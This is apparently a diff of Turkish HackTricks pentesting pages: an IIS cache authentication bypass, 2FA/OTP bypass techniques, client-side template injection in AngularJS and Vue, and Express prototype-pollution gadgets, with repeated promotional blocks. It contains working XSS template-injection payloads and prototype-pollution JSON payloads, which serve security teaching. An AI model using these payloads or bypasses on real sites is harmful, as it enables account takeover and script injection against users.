[Tam rapor burada](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kodda bir hata, kullanıcı tarafından verilen şifreyi **doğru bir şekilde kontrol etmediği** için, şifre hash'i önbellekte zaten bulunan bir anahtara denk gelirse, saldırgan o kullanıcı olarak giriş yapabilecektir.
```python
# script for sanity check
> type test.py
@ -271,16 +289,28 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılım saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,32 +1,46 @@
# 2FA/OTP Geçme
# 2FA/OTP Atlatma
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
</details>
## **Gelişmiş İki Faktörlü Kimlik Doğrulama Geçme Teknikleri**
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## **Gelişmiş İki Faktörlü Kimlik Doğrulama Atlatma Teknikleri**
### **Doğrudan Uç Nokta Erişimi**
2FA'yı geçmek için, yolun önemli olduğunu bilerek, ilgili uç noktaya doğrudan erişin. Başarısız olursa, **Referrer başlığını** değiştirerek 2FA doğrulama sayfasından gezinme taklit edilebilir.
2FA'yı atlamak için, yolun önemli olduğunu bilerek, ilgili uç noktaya doğrudan erişin. Başarısız olursa, **Referrer başlığını** 2FA doğrulama sayfasından gezinme taklit etmek için değiştirin.
### **Token Yeniden Kullanımı**
Daha önce kullanılan token'ların hesap kimlik doğrulaması için tekrar kullanılması etkili olabilir.
Hesap içinde daha önce kullanılan token'ların kimlik doğrulama için tekrar kullanılması etkili olabilir.
### **Kullanılmayan Token'ların Kullanımı**
Başka bir hesaptaki 2FA'yı atlamak için kendi hesabınızdan bir token çıkarmak denenebilir.
Başka bir hesaptaki 2FA'yı atlamak için kendi hesabınızdan bir token çıkarmayı deneyebilirsiniz.
### **Token'ın Açığa Çıkması**
@ -34,19 +48,19 @@ Token'ın web uygulamasından gelen bir yanıtta açığa çıkıp çıkmadığ
### **Doğrulama Bağlantısı Sömürüsü**
Hesap oluşturulurken gönderilen **e-posta doğrulama bağlantısını** kullanarak 2FA olmadan profil erişimine izin verilebilir, ayrıca detaylı bir [yazıda](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) vurgulanmıştır.
Hesap oluşturulurken gönderilen **e-posta doğrulama bağlantısını** kullanarak 2FA olmadan profil erişimine izin verilebilir, ayrıntılar [bu yazıda](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) vurgulanmıştır.
### **Oturum Manipülasyonu**
Kullanıcının ve kurbanın hesabı için oturum başlatma ve kullanıcının hesabındaki 2FA'yı tamamlama, ardından devam etmeden kurbanın hesabının bir sonraki adımına erişmeye çalışma, arka uç oturum yönetimi sınırlamalarını sömürme girişiminde bulunur.
Kullanıcının ve kurbanın hesabı için oturumları başlatmak ve kullanıcının hesabındaki 2FA'yı tamamlamadan önce bir sonraki adıma erişmeye çalışmak, arka uç oturum yönetimi sınırlamalarını sömürerek kurbanın hesap akışındaki bir sonraki adıma erişmeye çalışır.
### **Şifre Sıfırlama Mekanizması**
Şifre sıfırlama işlevini inceleyerek, aynı bağlantıyı kullanarak birden fazla sıfırlamaya izin verip vermediğini kontrol etmek önemlidir. Yeniden sıfırlanan kimlik bilgileriyle giriş yapmak 2FA'yı atlayabilir.
Şifre sıfırlama işlevini incelemek, bir bağlantıyı kullanarak birden fazla sıfırlamaya izin verip vermediğini kontrol etmek önemlidir. Yeni sıfırlanan kimlik bilgileriyle giriş yapmak, 2FA'yı atlayabilir.
### **OAuth Platformu Tehdit Edilmesi**
### **OAuth Platformunun Ele Geçirilmesi**
Güvenilir bir **OAuth** platformunda (örneğin, Google, Facebook) bir kullanıcının hesabının tehlikeye atılması, 2FA'yı atlamak için bir yol sunabilir.
Güvenilir bir **OAuth** platformunda (örneğin, Google, Facebook) bir kullanıcının hesabının ele geçirilmesi, 2FA'yı atlamak için bir yol sunabilir.
### **Kaba Kuvvet Saldırıları**
@ -60,15 +74,15 @@ Genel bir sınırlama olmaksızın akış hızı sınırları varsa yavaş bir k
#### **Kod Yeniden Gönderme Sınırı Sıfırlama**
Kodun yeniden gönderilmesi sınırı sıfırlar, devam eden kaba kuvvet denemelerine olanak tanır.
Kodun yeniden gönderilmesi, sınırlamayı sıfırlar ve devam eden kaba kuvvet denemelerine olanak tanır.
#### **İstemci Tarafı Sınırlama Atlatma**
Bir belge, istemci tarafı sınırlamalarını atlatma tekniklerini detaylandırır.
Belgede, istemci tarafı sınırlamalarını atlatma teknikleri ayrıntılı olarak açıklanmıştır.
#### **Dahili Eylemler Sınır Yokluğu**
#### **Dahili Eylemler Sınırlama İçermez**
Sınırlamalar giriş denemelerini koruyabilir ancak dahili hesap eylemlerini koruyamayabilir.
Sınırlamalar, giriş denemelerini koruyabilir ancak dahili hesap eylemlerini koruyamaz.
#### **SMS Kodu Yeniden Gönderme Maliyetleri**
@ -76,7 +90,7 @@ SMS aracılığıyla kodların aşırı yeniden gönderilmesi şirkete maliyet g
#### **Sonsuz OTP Yeniden Oluşturma**
Basit kodlarla sonsuz OTP oluşturma, küçük bir kod setini tekrar deneyerek kaba kuvvet yapmayı sağlar.
Basit kodlarla sonsuz OTP oluşturma, küçük bir kod setini tekrar deneyerek kaba kuvvet yapılmasına izin verir.
### **Yarış Koşulu Sömürüsü**
@ -96,7 +110,7 @@ Basit kodlarla sonsuz OTP oluşturma, küçük bir kod setini tekrar deneyerek k
**X-Forwarded-For** başlığı aracılığıyla kurbanın IP adresini taklit etmek kısıtlamaları atlayabilir.
### **Eski Sürümlerin Kullanımı**
### **Eski Sürümlerin Kullanılması**
#### **Alt Alanlar**
@ -104,23 +118,23 @@ Alt alanları test etmek, 2FA desteği olmayan eski sürümleri kullanabilir vey
#### **API Uç Noktaları**
/v\*/ dizin yollarıyla belirtilen eski API sürümleri, 2FA'yı atlamak için savunmasız olabilir.
/v\*/ dizin yollarıyla belirtilen eski API sürümleri, 2FA atlatma yöntemlerine karşı savunmasız olabilir.
### **Önceki Oturumların İşlenmesi**
2FA etkinleştirildiğinde mevcut oturumların sonlandırılması, komprome oturumlardan yetkisiz erişime karşı hesapları korur.
2FA etkinleştirildiğinde mevcut oturumları sonlandırmak, yetkisiz erişime karşı hesapları korur.
### **Yedek Kodlarla Erişim Kontrolü Hataları**
2FA etkinleştirildiğinde hemen yedek kodların oluşturulması ve potansiyel yetkisiz erişim, özellikle CORS yanlış yapılandırmaları/XSS zafiyetleri ile, bir risk oluşturabilir.
### **2FA Sayfasında Bilgi ığının İfşası**
### **2FA Sayfasında Bilgi Sızdırma**
2FA doğrulama sayfasında hassas bilgi ifşası (örneğin, telefon numarası) endişe vericidir.
2FA doğrulama sayfasında hassas bilgi sızdırılması (örneğin, telefon numarası) endişe vericidir.
### **Şifre Sıfırlama ile 2FA'yı Devre Dışı Bırakma**
### **Şifre Sıfırlamanın 2FA'yı Devre Dışı Bırakması**
Potansiyel bir atlatma yöntemini gösteren bir süreç, hesap oluşturma, 2FA etkinleştirme, şifre sıfırlama ve ardından 2FA gereksinimi olmadan giriş yapma işlemlerini içerir.
Potansiyel bir atlatma yöntemini gösteren bir süreç, hesap oluşturma, 2FA etkinleştirme, şifre sıfırlama ve ardından 2FA gereksinimi olmadan giriş yapmayı içerir.
### **Sahte İstekler**
@ -130,17 +144,3 @@ Kaba kuvvet denemelerini gizlemek veya sınırlama mekanizmalarını yanıltmak
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
</details>

View file

@ -1,29 +1,42 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini edinin**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
# Özet
Bu, **sunucu tarafı şablon enjeksiyonu** gibi ancak **istemci** tarafında gerçekleşir. **SSTI**, uzaktaki sunucuda **kod yürütmenize izin verirken**, **CSTI**, kurbanın tarayıcısında **keyfi JavaScript kodu yürütmenize izin verebilir**.
Bu, **sunucu tarafı şablon enjeksiyonu** gibi ancak **istemci** tarafında gerçekleşir. **SSTI**, uzak sunucuda **kod yürütmenize izin verirken**, **CSTI**, kurbanın tarayıcısında **keyfi JavaScript** kodunu yürütmenize izin verebilir.
Bu zafiyetin **test edilmesi**, **SSTI** durumunda olduğu gibi çok **benzerdir**, yorumlayıcı **bir şablon bekler** ve onu yürütür. Örneğin, `{{ 7-7 }}` gibi bir yük ile, uygulama **savunmasız** ise bir `0` göreceksiniz ve değilse, orijinali göreceksiniz: `{{ 7-7 }}`
Bu zafiyetin **test edilmesi**, **SSTI** durumunda olduğu gibi çok **benzerdir**, yorumlayıcı bir **şablon** bekler ve onu yürütür. Örneğin, `{{ 7-7 }}` gibi bir yük ile, uygulama **savunmasız** ise bir `0` göreceksiniz ve değilse, orijinali göreceksiniz: `{{ 7-7 }}`
# AngularJS
AngularJS, HTML ile etkileşime geçen yaygın olarak kullanılan bir JavaScript çerçevesidir ve **`ng-app`** gibi direktifler olarak bilinen özellikler aracılığıyla HTML ile etkileşime geçer. Bu direktif, AngularJS'in HTML içeriğini işlemesine izin verir ve çift süslü parantez içinde JavaScript ifadelerinin yürütülmesini sağlar.
AngularJS, HTML ile etkileşime geçen yaygın olarak kullanılan bir JavaScript çerçevesidir ve **`ng-app`** olarak bilinen direktifler aracılığıyla HTML ile etkileşime geçer. Bu direktif, AngularJS'in HTML içeriğini işlemesine izin verir ve çift süslü parantezler içinde JavaScript ifadelerinin yürütülmesini sağlar.
Kullanıcı girdisinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine eklenmesi durumunda, keyfi JavaScript kodu yürütmek mümkündür. Bu, girdi içinde AngularJS sözdiziminden yararlanılarak başarılabilir. Aşağıda, JavaScript kodunun nasıl yürütülebileceğini gösteren örnekler bulunmaktadır:
Kullanıcı girinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine eklenmesi durumunda, keyfi JavaScript kodunu yürütmek mümkündür. Bu, giriş içinde AngularJS sözdizimini kullanarak başarılabilir. Aşağıda, JavaScript kodunun nasıl yürütülebileceğini gösteren örnekler bulunmaktadır:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -35,12 +48,12 @@ Kullanıcı girdisinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine
**AngularJS**'deki zafiyetin çok **temel bir çevrimiçi örneğini** [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) ve **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**'da bulabilirsiniz.
{% hint style="danger" %}
[**Angular 1.6 kum havuzunu kaldırdı**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) bu yüzden bu sürümden itibaren `{{constructor.constructor('alert(1)')()}}` veya `<input ng-focus=$event.view.alert('XSS')>` gibi bir yük çalışmalı.
[**Angular 1.6 kum havuzunu kaldırdı**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) bu nedenle bu sürümden itibaren `{{constructor.constructor('alert(1)')()}}` veya `<input ng-focus=$event.view.alert('XSS')>` gibi bir yük çalışmalıdır.
{% endhint %}
# VueJS
**Zafiyetli bir Vue** uygulamasını [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh) adresinde bulabilirsiniz.\
**Zafiyetli Vue** uygulamasını [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh) adresinde bulabilirsiniz.\
Çalışan yük: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Ve zafiyetli örneğin **kaynak kodu** burada: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
@ -48,9 +61,9 @@ Ve zafiyetli örneğin **kaynak kodu** burada: [https://github.com/azu/vue-clien
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
## **V3**
Bir VUE'da CSTI hakkında gerçekten iyi bir yazı [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) adresinde bulunabilir.
VUE'da CSTI hakkında gerçekten iyi bir yazıya [buradan](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) ulaşılabilir.
## **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
@ -86,17 +99,28 @@ javascript:alert(1)%252f%252f..%252fcss-images
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına PR göndererek paylaşın.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,26 +1,40 @@
# Express Prototype Pollution Araçları
# Express Prototype Pollution Gadgets
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
- **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## XSS yanıtlarını sunun
**Daha fazla ayrıntı için [orijinal araştırmaya](https://portswigger.net/research/server-side-prototype-pollution) göz atın**
**Daha fazla ayrıntı için [orijinal araştırmaya göz atın](https://portswigger.net/research/server-side-prototype-pollution)**
### JSON içerik türünü HTML olarak değiştirin
### JSON içerik türünü HTML'ye değiştirin
Bir Express uygulamasında, bir **JSON içerik türü yanıtı** kullanarak ve bir JSON yansıtarak:
Bir Express uygulamasında **JSON içerik türü yanıtı** kullanan ve bir JSON yansıtan:
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -28,15 +42,15 @@ _.merge({}, req.body);
res.send(req.body);
});
```
Bu durumlarda JSON içerik türüyle genellikle XSS mümkün değildir. Ancak, prototip kirliliği ile Express'i **bir HTML yanıtı sunmaya kandırabiliriz.** Bu güvenlik açığı, uygulamanın **`res.send(obj)`** kullanmasına ve application/json içerik türüyle body parser'ı kullanmasına dayanır.
Bu durumlarda XSS genellikle JSON içerik türüyle mümkün olmaz. Bununla birlikte, prototype pollution ile Express'i bir HTML yanıtı sunmaya **yanıltabiliriz.** Bu zafiyet, uygulamanın **`res.send(obj)`** kullanmasına ve application/json içerik türüyle body ayrıştırıcısını kullanmasına dayanır.
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
**`body`** ve **`_body`** özelliklerini **kirlendirerek**, Express'in HTML içerik türünü sunmasını ve `_body` özelliğini yansıtmasını sağlamak mümkündür, bu da depolanan XSS'e neden olur.
**`body`** ve **`_body`** özelliklerini **kirleterek**, **Express'in HTML içerik türünü sunmasına** ve **_body** özelliğini yansıtarak depolanan XSS'e neden olmak mümkündür.
### UTF7 Renderleme
### UTF7 Rendeleme
Express'in **UTF-7 içeriği renderlaması mümkündür**:
Express'in **UTF-7 içeriği render etmesi mümkündür**:
```json
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
```
@ -44,25 +58,25 @@ Express'in **UTF-7 içeriği renderlaması mümkündür**:
### JSON boşlukları
Aşağıdaki PP, bir JSON içindeki özniteliklere işlevselliği bozmayacak ek bir boşluk ekleyecektir:
Aşağıdaki PP, bir JSON içindeki özelliklere işlevselliği bozmayacak ek bir boşluk ekleyecektir:
```json
{"__proto__":{"json spaces": " "}}
```
Daha sonra yansıtılan bir JSON şu şekilde görünecektir:
